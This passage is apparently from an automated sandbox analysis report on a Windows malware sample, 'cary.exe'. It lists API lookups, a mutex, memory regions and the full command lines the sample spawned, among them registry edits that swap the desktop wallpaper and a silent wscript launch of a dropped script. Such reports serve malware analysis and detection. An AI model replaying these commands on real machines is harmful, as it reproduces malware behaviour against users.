| Get Address | c:\windows\syswow64\ole32.dll | function = CoSuspendClassObjects, address_out = 0x76e81f60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeConditionVariable, address_out = 0x77cf9da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeConditionVariable, address_out = 0x77d05860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeAllConditionVariable, address_out = 0x77d03370 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableCS, address_out = 0x74fa2850 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAIoctl, address_out = 0x769bdca0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = __WSAFDIsSet, address_out = 0x769c2f20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = closesocket, address_out = 0x769b9ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ioctlsocket, address_out = 0x769bd860 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAGetLastError, address_out = 0x769c38d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAStartup, address_out = 0x769c2420 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSACleanup, address_out = 0x769bda00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = accept, address_out = 0x769c4030 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = bind, address_out = 0x769be0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = connect, address_out = 0x769c33a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getpeername, address_out = 0x769c12c0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getsockname, address_out = 0x769be030 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getsockopt, address_out = 0x769c1180 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = htonl, address_out = 0x769c3670 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = htons, address_out = 0x769c3650 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = inet_addr, address_out = 0x769c2e90 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = inet_ntoa, address_out = 0x769c4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = listen, address_out = 0x769c3f40 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ntohl, address_out = 0x769c3670 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ntohs, address_out = 0x769c3650 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = recv, address_out = 0x769bcff0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = recvfrom, address_out = 0x769c4d60 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = select, address_out = 0x769c48e0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = send, address_out = 0x769bce20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = sendto, address_out = 0x769c15a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = setsockopt, address_out = 0x769b9560 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = shutdown, address_out = 0x769c14e0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = socket, address_out = 0x769b9780 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostbyaddr, address_out = 0x769dc600 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostbyname, address_out = 0x769dc790 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getprotobyname, address_out = 0x769db6d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getprotobynumber, address_out = 0x769db820 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getservbyname, address_out = 0x769dcad0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getservbyport, address_out = 0x769dccb0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostname, address_out = 0x769dc920 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getaddrinfo, address_out = 0x769b52b0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = freeaddrinfo, address_out = 0x769b4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getnameinfo, address_out = 0x769c16a0 |
|
1 |
System (147)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
4 | |
| Sleep | duration = 10 milliseconds (0.010 seconds) |
|
64 | |
| Sleep | duration = -1 (infinite) |
|
1 | |
| Get Time | type = Ticks, time = 127187 |
|
3 | |
| Get Time | type = Local Time, time = 2018-11-10 06:46:02 (Local Time) |
|
4 | |
| Get Time | type = Local Time, time = 2018-11-10 06:48:46 (Local Time) |
|
64 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Hardware Information |
|
2 | |
| Get Info | type = Operating System |
|
3 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MutexNOBADDONW |
|
1 | |
| Open | mutex_name = MutexNOBADDONW, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 |
Network Behavior
DNS (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Hostname | name_out = LHnIwsj |
|
1 | |
| Resolve Name | host = LHnIwsj, address_out = 192.168.0.96 |
|
1 |
Process #7: cmd.exe
75
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hdOYQpCI.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:30, Reason: Child Process |
| Unmonitor | End Time: 00:01:55, Reason: Self Terminated |
| Monitor Duration | 00:00:25 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd98 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C40
0x
D80
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000001c0000 | 0x001c0000 | 0x001dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001e3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x00203fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00353fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000360000 | 0x00360000 | 0x00360fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x00371fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00380000 | 0x0043dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x0076ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x04980000 | 0x04cb6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f430000 | 0x7f430000 | 0x7f52ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f530000 | 0x7f530000 | 0x7f552fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f556000 | 0x7f556000 | 0x7f556fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f557000 | 0x7f557000 | 0x7f559fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f55a000 | 0x7f55a000 | 0x7f55cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f55d000 | 0x7f55d000 | 0x7f55dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 8, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\reg.exe | os_pid = 0xcac, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\reg.exe | os_pid = 0xe88, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\reg.exe | os_pid = 0xddc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (35)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
13 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
4 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
4 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
3 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 |
Process #8: cmd.exe
57
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\9DndEMsj.vbs" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:30, Reason: Child Process |
| Unmonitor | End Time: 00:02:52, Reason: Self Terminated |
| Monitor Duration | 00:01:22 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc94 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D88
0x
DD4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a90000 | 0x00a90000 | 0x04a8ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a90000 | 0x04a90000 | 0x04aaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a90000 | 0x04a90000 | 0x04a9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004aa0000 | 0x04aa0000 | 0x04aa3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ab0000 | 0x04ab0000 | 0x04ab1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ab0000 | 0x04ab0000 | 0x04ab3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ac0000 | 0x04ac0000 | 0x04ad3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ae0000 | 0x04ae0000 | 0x04b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b20000 | 0x04b20000 | 0x04c1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c20000 | 0x04c20000 | 0x04c23fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004c30000 | 0x04c30000 | 0x04c30fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c40000 | 0x04c40000 | 0x04c41fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c50000 | 0x04c50000 | 0x04c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ca0000 | 0x04ca0000 | 0x04d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e10000 | 0x04e10000 | 0x04e1ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04e20000 | 0x04eddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004ee0000 | 0x04ee0000 | 0x04fdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005130000 | 0x05130000 | 0x0513ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05140000 | 0x05476fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ed80000 | 0x7ed80000 | 0x7ee7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ee80000 | 0x7ee80000 | 0x7eea2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eea5000 | 0x7eea5000 | 0x7eea7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eea8000 | 0x7eea8000 | 0x7eea8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eeab000 | 0x7eeab000 | 0x7eeadfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eeae000 | 0x7eeae000 | 0x7eeaefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 176, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\wscript.exe | os_pid = 0xcc0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #11: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Self Terminated |
| Monitor Duration | 00:00:55 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd74 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D50
0x
DF4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x0499ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004980000 | 0x04980000 | 0x0498ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004990000 | 0x04990000 | 0x04993fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049a0000 | 0x049a0000 | 0x049a1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049a0000 | 0x049a0000 | 0x049a3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000049b0000 | 0x049b0000 | 0x049c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000049d0000 | 0x049d0000 | 0x04a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a10000 | 0x04a10000 | 0x04b0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b10000 | 0x04b10000 | 0x04b13fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004b20000 | 0x04b20000 | 0x04b20fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04b31fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b40000 | 0x04b40000 | 0x04b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b60000 | 0x04b60000 | 0x04b6ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04b70000 | 0x04c2dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004c30000 | 0x04c30000 | 0x04d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d30000 | 0x04d30000 | 0x04d6ffff | Private Memory | rw |
